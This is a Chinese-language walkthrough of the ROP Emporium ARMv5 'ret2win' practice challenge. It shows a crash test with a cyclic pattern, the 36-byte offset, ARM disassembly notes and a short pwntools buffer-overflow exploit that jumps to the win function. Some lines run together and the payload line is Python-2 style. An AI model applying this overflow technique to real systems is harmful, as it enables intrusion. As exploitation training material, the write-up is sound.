ROP_Emporium_ret2win_armv5
文章目录
- ret2win_armv5
- 信息收集
- 黑盒测试
- 反汇编
- Exp
ret2win_armv5
依赖:
sudo apt install qemu-arm-static gcc-arm-linux-gnueabi
信息收集
$ file ret2win_armv5
ret2win_armv5: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=a82dade296415721f90684517d0e6259d4ba2905, not stripped黑盒测试
$ ulimit -c unlimited && sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern'
$ cyclic 200 > cyclic.txt
$ qemu-arm-static ret2win_armv5 < cyclic.txt
ret2win by ROP Emporium
ARMv5For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!> Thank you!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault
$ gdb-multiarch ./ret2win_armv5 qemu_ret2win_armv5_20220506-214059_17303.core
...
#0 0x6161616a in ?? ()
$ cyclic -l 0x6161616a
36
反汇编
$ arm-linux-gnueabi-objdump -d ret2win_armv5
...
00010518 <main>:
...1053c: ebffffa4 bl 103d4 <puts@plt>10540: e59f0020 ldr r0, [pc, #32] ; 10568 Pwnme开头的PUSH {R11,LR},是先入栈LR(返回地址),再入栈R11(相当于EBP)。add fp, sp, #4,这应该是FULL栈(栈指针指向当前顶部数据的地址)。缓冲区位于fp+36,和测试偏移一致。
Exp
from pwn import *context.clear()
# context.log_level = 'debug'program = "ret2win_armv5"
# context.binary(program)
context.arch = "arm"
context.endian = "little"
context.bits = 32def getio(program):io = process(program)# io = gdb.debug([program], "b main")return io;io = getio(program)# p = gdb.debug(program, "b main")
# pause()pRet2Win = 0x000105ec;
payload = bytes("A"*36)
payload += p32(pRet2Win)io.recvuntil(">")io.sendline(payload)io.interactive()
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!